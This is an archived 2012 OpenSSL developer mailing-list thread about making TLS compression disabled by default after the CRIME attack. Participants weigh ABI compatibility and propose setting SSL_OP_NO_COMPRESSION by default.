Re: OpenSSL and CRIME
On Tue, 2012-10-23 at 20:18 +0200, Dr. Stephen Henson wrote: On Tue, Oct 23, 2012, Tomas Hoger wrote: On Thu, 18 Oct 2012 23:55:41 +0200 Andrey Kulikov wrote: OpenSSL enables zlib by default. Could you please advice for what version and platform this is true? openssl-1.0.1c for linux-elf has no-zlib configured by default. Sorry, I asked the wrong way. OpenSSL, when compiled with zlib support, enables deflate (id 1) compression by default. I was wondering if this should stay as is or should change to disabled by default even when zlib support is compiled in (i.e. compression will only get used when explicitly enabled by an application using the library). The change would render SSL_OP_NO_COMPRESSION meaningless and possibly want a new option for doing the opposite. There isn't any room in the options field for new options, so that's tricky. An alternative would be to set SSL_OP_NO_COMPRESSION by default and require applications that need compression support to explicilty clear it with SSL_CTX_clear_options(ctx, SSL_OP_NO_COMPRESSION); I agree this is the solution that should be used as this does not break the ABI. -- Tomas Mraz No matter how far down the wrong road you've gone, turn back. Turkish proverb __ OpenSSL Project http://www.openssl.org Development Mailing List openssl-dev@openssl.org Automated List Manager majord...@openssl.org
Re: OpenSSL and CRIME
On Thu, 18 Oct 2012 23:55:41 +0200 Andrey Kulikov wrote: OpenSSL enables zlib by default. Could you please advice for what version and platform this is true? openssl-1.0.1c for linux-elf has no-zlib configured by default. Sorry, I asked the wrong way. OpenSSL, when compiled with zlib support, enables deflate (id 1) compression by default. I was wondering if this should stay as is or should change to disabled by default even when zlib support is compiled in (i.e. compression will only get used when explicitly enabled by an application using the library). The change would render SSL_OP_NO_COMPRESSION meaningless and possibly want a new option for doing the opposite. -- Tomas Hoger __ OpenSSL Project http://www.openssl.org Development Mailing List openssl-dev@openssl.org Automated List Manager majord...@openssl.org
Re: OpenSSL and CRIME
On Tue, Oct 23, 2012, Tomas Hoger wrote: On Thu, 18 Oct 2012 23:55:41 +0200 Andrey Kulikov wrote: OpenSSL enables zlib by default. Could you please advice for what version and platform this is true? openssl-1.0.1c for linux-elf has no-zlib configured by default. Sorry, I asked the wrong way. OpenSSL, when compiled with zlib support, enables deflate (id 1) compression by default. I was wondering if this should stay as is or should change to disabled by default even when zlib support is compiled in (i.e. compression will only get used when explicitly enabled by an application using the library). The change would render SSL_OP_NO_COMPRESSION meaningless and possibly want a new option for doing the opposite. There isn't any room in the options field for new options, so that's tricky. An alternative would be to set SSL_OP_NO_COMPRESSION by default and require applications that need compression support to explicilty clear it with SSL_CTX_clear_options(ctx, SSL_OP_NO_COMPRESSION); Steve. -- Dr Stephen N. Henson. OpenSSL project core developer. Commercial tech support now available see: http://www.openssl.org __ OpenSSL Project http://www.openssl.org Development Mailing List openssl-dev@openssl.org Automated List Manager majord...@openssl.org
Re: OpenSSL and CRIME
Hi, OpenSSL enables zlib by default. Could you please advice for what version and platform this is true? openssl-1.0.1c for linux-elf has no-zlib configured by default.
Re: OpenSSL and CRIME
On Mon, Oct 8, 2012 at 5:13 PM, Tomas Hoger tho...@redhat.com wrote: Hi! Are there any plans to apply any changes to OpenSSL related to the recent CRIME attack? Unlike other libraries (e.g. GnuTLS or NSS), OpenSSL enables zlib by default. Is there a plan to change the default in response to the published attack? I'm aware of the existing SSL_OP_NO_COMPRESSION option as a workaround. Thank you! Its an interesting point - perhaps we should change the default. -- Tomas Hoger __ OpenSSL Project http://www.openssl.org Development Mailing List openssl-dev@openssl.org Automated List Manager majord...@openssl.org
OpenSSL and CRIME
Hi! Are there any plans to apply any changes to OpenSSL related to the recent CRIME attack? Unlike other libraries (e.g. GnuTLS or NSS), OpenSSL enables zlib by default. Is there a plan to change the default in response to the published attack? I'm aware of the existing SSL_OP_NO_COMPRESSION option as a workaround. Thank you! -- Tomas Hoger __ OpenSSL Project http://www.openssl.org Development Mailing List openssl-dev@openssl.org Automated List Manager majord...@openssl.org
